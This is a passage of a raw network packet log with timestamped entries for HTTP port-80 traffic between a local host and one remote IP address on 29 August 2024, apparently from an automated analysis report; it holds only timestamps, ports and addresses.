                                  Aug 29, 2024 23:42:09.348891020 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.348896980 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.348912001 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.348934889 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.351583958 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.351594925 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.351612091 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.351622105 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.351633072 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.351639032 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.351644039 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.351656914 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.351665974 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.351669073 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.351686954 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.351700068 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.351701021 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.351712942 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.351723909 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.351736069 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.351747990 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.351749897 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.351768017 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.351793051 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.351821899 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.351834059 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.351844072 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.351854086 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.351872921 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.351906061 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.351906061 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.351950884 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.351962090 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.351972103 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.351984024 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.351995945 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.352008104 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.352020979 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.352099895 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352112055 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352121115 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352132082 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352145910 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352154016 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.352154016 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.352158070 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352170944 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352181911 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.352190018 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352202892 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352205992 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.352231026 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.352251053 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.352356911 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352369070 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352379084 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352391005 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352401972 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352401972 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.352413893 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352425098 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352427006 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.352448940 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.352471113 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.352513075 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352524042 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352529049 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352534056 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352555037 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352556944 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.352571964 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352581978 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.352583885 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352595091 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352607012 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352606058 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.352627993 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.352653027 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.352788925 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352801085 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352809906 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352821112 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352832079 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352833986 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.352844954 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352854013 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.352876902 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.352890968 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.354809046 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.354868889 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.354904890 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.354916096 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.354932070 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.354943991 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.354952097 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.354955912 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.354969025 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.354969978 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.354980946 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355000019 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.355016947 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.355042934 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.355370998 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355382919 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355392933 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355422020 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.355449915 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355449915 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.355463982 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355473995 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355488062 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355496883 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.355498075 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355526924 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.355540991 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.355562925 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355575085 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355581045 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355591059 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355616093 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.355640888 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.355658054 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355669022 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355679035 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355690956 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355700016 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.355704069 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355715036 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.355741978 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.355775118 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355786085 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355794907 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355807066 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355817080 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.355825901 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355843067 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.355855942 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355866909 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355871916 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.355878115 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355900049 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.355916023 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.355931997 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355942011 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355952024 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355962992 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355973959 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355976105 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.355984926 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355999947 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.356013060 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.356039047 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.356076002 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.356087923 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.356102943 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.356113911 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.356121063 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.356127024 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.356141090 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.356143951 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.356169939 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.356195927 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.436348915 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.436429977 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.436525106 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.436537027 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.436547995 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.436568975 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.436575890 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.436583996 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.436594963 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.436606884 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.436606884 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.436619997 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.436630964 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.436639071 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.436650038 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.436662912 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.436667919 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.436671972 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.436686039 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.436698914 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.436731100 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.436762094 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.437230110 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.437274933 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.533024073 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.533041000 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.533051014 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.533052921 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.533071041 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.533082962 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.533090115 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.533114910 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.533133030 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.533138990 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.533144951 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.533157110 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.533165932 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.533176899 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.533205032 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.613488913 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.613497972 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.613503933 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.613590956 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.613606930 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.613615036 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.613631010 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.613641977 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.613765955 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.613818884 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.613842010 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.613852978 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.613863945 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.613883972 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.613895893 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.613907099 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.613918066 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.613934040 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.614005089 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.614276886 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.614316940 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.614347935 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.614358902 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.614373922 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.614399910 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.614403963 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.614412069 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.614422083 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.614447117 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.614454031 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.614464045 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.614474058 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.614489079 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.614496946 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.614500999 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.614540100 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.617707968 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.617774010 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.617834091 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.617845058 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.617856026 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.617868900 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.617883921 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.617885113 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.617914915 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.617934942 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.617947102 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.617959023 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.617969036 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.617984056 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.617995977 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.617996931 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618019104 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.618046045 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.618163109 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618175030 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618202925 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618212938 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.618212938 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618225098 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618237019 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618248940 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.618248940 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618258953 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.618263006 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618274927 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618285894 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618293047 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.618297100 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618319035 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.618338108 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.618628025 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618642092 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618652105 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618664980 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618676901 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.618679047 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618691921 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618701935 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.618705034 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618716955 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618722916 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.618726969 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618738890 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618750095 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618752956 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.618761063 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.618782997 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618793011 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.618797064 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618808985 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618819952 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618830919 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618833065 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.618839979 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.618844032 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618856907 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618874073 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.618899107 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.618920088 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618931055 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618940115 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618951082 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618963957 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618964911 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.618978024 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618983030 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.618989944 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.619003057 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.619009018 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.619014978 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.619029999 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.619035006 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.619035006 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.619043112 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.619062901 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.619075060 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.619082928 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.619128942 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.620548010 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.620558977 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.620575905 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.620589018 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.620599031 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.620601892 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.620613098 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.620625019 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.620630026 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.620639086 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.620647907 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.620671034 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.620693922 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.620841980 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.620870113 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.620879889 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.620889902 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.620891094 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.620914936 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.620943069 CEST4973080192.168.2.4172.67.128.117
